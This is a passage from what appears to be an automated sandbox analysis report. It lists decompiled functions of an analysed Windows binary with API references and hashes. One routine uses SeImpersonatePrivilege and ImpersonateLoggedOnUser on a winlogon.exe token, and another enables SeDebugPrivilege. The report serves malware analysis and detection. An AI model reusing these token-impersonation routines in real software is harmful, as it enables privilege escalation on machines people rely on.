                                                                                                                                                                                                                          • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                                                                                                                                                          0x00401f04
                                                                                                                                                                                                                          0x00401f20
                                                                                                                                                                                                                          0x00401f27
                                                                                                                                                                                                                          0x00401f38
                                                                                                                                                                                                                          0x00401f3f
                                                                                                                                                                                                                          0x00401f4e
                                                                                                                                                                                                                          0x00401f54
                                                                                                                                                                                                                          0x00401f5f
                                                                                                                                                                                                                          0x00401f6e
                                                                                                                                                                                                                          0x00401f72
                                                                                                                                                                                                                          0x00401f77
                                                                                                                                                                                                                          0x00401f78
                                                                                                                                                                                                                          0x00401f91
                                                                                                                                                                                                                          0x00401f7a
                                                                                                                                                                                                                          0x00401f88
                                                                                                                                                                                                                          0x00401f8e
                                                                                                                                                                                                                          0x00401f8e
                                                                                                                                                                                                                          0x00401fa6
                                                                                                                                                                                                                          0x00401fa9
                                                                                                                                                                                                                          0x00401fae
                                                                                                                                                                                                                          0x00401fb0
                                                                                                                                                                                                                          0x00401fb2
                                                                                                                                                                                                                          0x00401fb9
                                                                                                                                                                                                                          0x00401fc2
                                                                                                                                                                                                                          0x00401fca
                                                                                                                                                                                                                          0x00401fd2
                                                                                                                                                                                                                          0x00401fd2
                                                                                                                                                                                                                          0x00401fd7
                                                                                                                                                                                                                          0x00401fd7
                                                                                                                                                                                                                          0x00401fe3

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401F27
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401F3F
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00401F5A
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00401F69
                                                                                                                                                                                                                          • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                                                                                                                            • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                                                                                                                            • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                                                                                                                          • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                                                                                                                          • API String ID: 3867304300-2177360481
                                                                                                                                                                                                                          • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                                                                                                                          • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                                                                                                                                          0x0040955f
                                                                                                                                                                                                                          0x00409566
                                                                                                                                                                                                                          0x0040956e
                                                                                                                                                                                                                          0x00409576
                                                                                                                                                                                                                          0x00409586
                                                                                                                                                                                                                          0x00409586
                                                                                                                                                                                                                          0x0040956e
                                                                                                                                                                                                                          0x00409592
                                                                                                                                                                                                                          0x004095aa
                                                                                                                                                                                                                          0x00409594
                                                                                                                                                                                                                          0x004095a3
                                                                                                                                                                                                                          0x004095a6
                                                                                                                                                                                                                          0x004095a6

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                          • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                                                                                                                          • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                                          			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
				return _t22;
			}











                                                                                                                                                                                                                          0x00402f3a
                                                                                                                                                                                                                          0x00402f51
                                                                                                                                                                                                                          0x00402f60
                                                                                                                                                                                                                          0x00402f6f
                                                                                                                                                                                                                          0x00402f78
                                                                                                                                                                                                                          0x00402f7a
                                                                                                                                                                                                                          0x00402f7a
                                                                                                                                                                                                                          0x00402f8a
                                                                                                                                                                                                                          0x00402f8f
                                                                                                                                                                                                                          0x00402f94
                                                                                                                                                                                                                          0x00402f99
                                                                                                                                                                                                                          0x00402f9e
                                                                                                                                                                                                                          0x00402f9f
                                                                                                                                                                                                                          0x00402fad
                                                                                                                                                                                                                          0x00402fb2
                                                                                                                                                                                                                          0x00402fb2
                                                                                                                                                                                                                          0x00402fbd
                                                                                                                                                                                                                          0x00402fc5

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402F51
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00402F8A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                          • String ID: .cfg
                                                                                                                                                                                                                          • API String ID: 776488737-3410578098
                                                                                                                                                                                                                          • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                                                                                                                          • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                                                                                                          			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                                                                                                                                                          0x00409ddc
                                                                                                                                                                                                                          0x00409de4
                                                                                                                                                                                                                          0x00409df0
                                                                                                                                                                                                                          0x00409df5
                                                                                                                                                                                                                          0x00409df6
                                                                                                                                                                                                                          0x00409e03
                                                                                                                                                                                                                          0x00409e05
                                                                                                                                                                                                                          0x00409e06
                                                                                                                                                                                                                          0x00409e3b
                                                                                                                                                                                                                          0x00409e5d
                                                                                                                                                                                                                          0x00409e6a
                                                                                                                                                                                                                          0x00409e73
                                                                                                                                                                                                                          0x00409e75
                                                                                                                                                                                                                          0x00409e08
                                                                                                                                                                                                                          0x00409e08
                                                                                                                                                                                                                          0x00409e19
                                                                                                                                                                                                                          0x00409e37
                                                                                                                                                                                                                          0x00409e37
                                                                                                                                                                                                                          0x00409e81

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409E08
                                                                                                                                                                                                                            • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                                                                                                                            • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409E3B
                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1127616056-0
                                                                                                                                                                                                                          • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                                                                                                                          • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                                                                                                                          0x00404951
                                                                                                                                                                                                                          0x00404952
                                                                                                                                                                                                                          0x00404956
                                                                                                                                                                                                                          0x004049a1
                                                                                                                                                                                                                          0x00404958
                                                                                                                                                                                                                          0x00404959
                                                                                                                                                                                                                          0x0040495b
                                                                                                                                                                                                                          0x0040495b
                                                                                                                                                                                                                          0x0040495f
                                                                                                                                                                                                                          0x00404961
                                                                                                                                                                                                                          0x00404963
                                                                                                                                                                                                                          0x0040496d
                                                                                                                                                                                                                          0x00404975
                                                                                                                                                                                                                          0x00404977
                                                                                                                                                                                                                          0x0040497b
                                                                                                                                                                                                                          0x00404985
                                                                                                                                                                                                                          0x0040498a
                                                                                                                                                                                                                          0x0040498e
                                                                                                                                                                                                                          0x00404993
                                                                                                                                                                                                                          0x0040499d
                                                                                                                                                                                                                          0x0040499d

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 0040496D
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00404985
                                                                                                                                                                                                                          • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                                                                                                                          • String ID: W@
                                                                                                                                                                                                                          • API String ID: 3056473165-1729568415
                                                                                                                                                                                                                          • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                                                                                                                          • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                                                                                                                                                          0x0040543f
                                                                                                                                                                                                                          0x00405456
                                                                                                                                                                                                                          0x00405462
                                                                                                                                                                                                                          0x00405467
                                                                                                                                                                                                                          0x0040546d
                                                                                                                                                                                                                          0x00405478
                                                                                                                                                                                                                          0x00405489
                                                                                                                                                                                                                          0x0040548d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405492
                                                                                                                                                                                                                          0x00405496

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                                                                            • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                                                                                                                            • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3725422290-0
                                                                                                                                                                                                                          • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                                                                                                                          • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409E82, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                                                                                                                                                            • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                                                                                                                                                            • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                                                                                                                                                            • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4232544981-0
                                                                                                                                                                                                                          • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                                                                                                                          • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                                                                                                                                                          0x00408f4c
                                                                                                                                                                                                                          0x00408f57
                                                                                                                                                                                                                          0x00408f60
                                                                                                                                                                                                                          0x00408f62
                                                                                                                                                                                                                          0x00408f67
                                                                                                                                                                                                                          0x00408f67
                                                                                                                                                                                                                          0x00408f71

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                                                                                                                            • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 187924719-0
                                                                                                                                                                                                                          • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                                                                                                                          • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                          			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                                                                                                                                          0x004098fa
                                                                                                                                                                                                                          0x004098fc
                                                                                                                                                                                                                          0x00409901
                                                                                                                                                                                                                          0x00409907
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040991c
                                                                                                                                                                                                                          0x00409918
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
